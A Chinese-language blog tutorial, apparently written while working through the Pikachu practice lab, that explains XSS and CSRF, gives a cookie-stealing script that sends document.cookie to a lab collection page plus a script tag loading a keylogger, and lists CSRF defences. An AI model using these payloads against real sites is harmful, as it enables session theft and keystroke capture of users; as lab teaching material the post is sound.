首页 > 其他分享 >XSS和CSRF漏洞

XSS和CSRF漏洞

时间:2023-03-19 21:22:17浏览次数:34  
标签:XSS 漏洞 攻击 pikachu 利用 CSRF

XSS和CSRF漏洞

目录

XSS漏洞介绍

XSS(Cross-Site-Scripting),即跨站脚本攻击,是指攻击者利用Web服务器中的代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。

XSS分类

  • 反射型XSS
  • 存储型XSS
  • DOM型XSS

利用XSS漏洞如何实行攻击

利用XSS盗取用户的Cookie

可利用pikachu的XSS后台管理,在反射型get中输入代码,在XSS后台管理就可以看到信息。这里的路径需要根据自己的文件路径。

<script> document.location = 'http://localhost/pikachu-master/pkxss/xcookie/cookie.php?cookie='+document.cookie; </script>

按理来说XSS存储型也可以,但是记住,如果用XSS存储型测试,每次进入XSS存储界面就会跳转到index.php,如果想要解决就得去数据库把插入的脚本删掉。数据在pikachu.message中。

利用XSS实行钓鱼

PHP 的 HTTP 认证机制仅在 PHP 以 Apache 模块方式运行时才有效,因此该功能不适用于 CGI 版本。由于我使用的是小皮面板,里面默认的是用CGI/FastCGI,用pikachu靶场实施钓鱼一直没有成功。

利用XSS进行键盘监控
<script  src=" http://localhost/pikachu-master/pkxss/rkeypress/rk.js"></script>

CSRF漏洞介绍

CSRF(Cross-Site Request Forgery),即跨站请求伪造攻击。攻击者可以盗用你的登陆信息,以你的身份模拟发送各种请求对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。

CSRF漏洞攻击条件

  1. 登录受信任网站A,并在本地生成Cookie
  2. 在不登出网站A的情况下,访问危险网站B

CSRF防御

  • 验证HTTP Referer字段
  • 添加token并验证
  • 在HTTP头中自定义属性并验证

标签:XSS,漏洞,攻击,pikachu,利用,CSRF
From: https://www.cnblogs.com/candada/p/17234344.html

相关文章

  • cisco rv34x漏洞复现(利用失败)(求助帖)
    前言:某公司技术面时提示我在漏洞利用方向上经验不足,并且需要提交一份无poc的漏洞报告,才有了今天的这篇文章记录在翻找漏洞的时候看到这个漏洞d   看到是缓冲区溢......
  • pikachu-CSRF
    CSRF(跨站请求伪造)概述Cross-siterequestforgery简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,......
  • SudoEdit(CVE-2023-22809) 提权漏洞分析
    SudoEdit(CVE-2023-22809)提权漏洞分析TRANSLATEwithxEnglishArabicHebrewPolishBulgarianHindiPortugueseCatalanHmongDawRomanianChine......
  • XSS和CSRF漏洞
    XSS和CSRF漏洞XSS漏洞介绍XSS(Cross-Site-Scripting),即跨站脚本攻击,是指攻击者利用Web服务器中的代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码),当......
  • pikachu -Xss
    跨站脚本漏洞常见类型危害:存储型>反射型>DOM型1.反射型交互的数据一般不会被存在在数据库里面,一次性,所见即所得,一般出现在查询类页面等。2.存储型交互的数据会被......
  • 【漏洞复现】PHP-CMS v1.0 SQL注入漏洞(CVE-2022-26613)
    【漏洞复现】PHP-CMSv1.0SQL注入漏洞(CVE-2022-26613)0x01漏洞描述春秋云镜靶场:PHP-CMSv1.0存在SQL注入漏洞,攻击者可获得敏感信息。CVE:PHP-CMSv1.0wasdiscovered......
  • 漏洞扫描与安全加固之Apache Axis组件
    一、ApacheAxis组件高危漏洞自查及整改ApacheAxis组件存在由配置不当导致的远程代码执行风险。1.影响版本Axis1和Axis2各版本均受影响2.处置建议1)禁用此服务的远......
  • C代码审计之整数溢出漏洞
    整数溢出就是对整数操作时产生了超过表示范围的数值 溢出:在C中有符号整数溢出是未定义的行为,编译器的做法是回绕或陷阱??回绕:数据表示范围的上界和下界形成一个闭环。上......
  • 【漏洞复现】74cmsSEv3.4.1任意文件读取漏洞(CVE-2022-26271)
    【漏洞复现】74cmsSEv3.4.1任意文件读取漏洞(CVE-2022-26271)0x01漏洞描述春秋云镜靶场:74cmsSEv3.4.1存在任意文件读取漏洞。CVE描述:74cmsSEv3.4.1wasdiscoveredto......
  • 关于CSRF漏洞的一次有趣的交互
    前言在一次项目中,挖掘了一些CSRF漏洞,将细节提交给客户后,发生了一些有趣的交互,这里简单的先把他叫为薛定谔的CSRF,对其深入了解了一下,且听我细细道来。薛定谔的CSRF故事背......